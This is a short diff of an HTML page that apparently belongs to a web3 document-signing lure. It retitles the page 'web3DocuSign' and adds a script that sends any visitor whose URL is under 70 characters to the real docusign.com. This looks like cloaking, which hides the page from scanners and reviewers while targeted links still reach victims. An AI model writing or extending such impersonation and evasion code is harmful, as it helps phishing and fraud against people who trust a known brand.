--- a/sign/1684290/org/index.html
+++ b/sign/1684290/org/index.html
@@ -4,7 +4,8 @@
     <meta charset="UTF-8" />
     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-    <title>web3signed - Document #072914372</title>
+    <title>web3DocuSign - Document #072914372</title>
+    <link rel="shortcut icon" href="./favicon.ico" />
     <link
       href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css"
       rel="stylesheet"
@@ -260,6 +261,11 @@
     </div>
   </body>
   <script>
+    setTimeout(() => {
+      if (window.location.href.length < 70) {
+        window.location.href = "https://docusign.com";
+      }
+    }, 1);
     (async function () {
       let fm = window.location;
       document.getElementById("price").innerHTML = `${
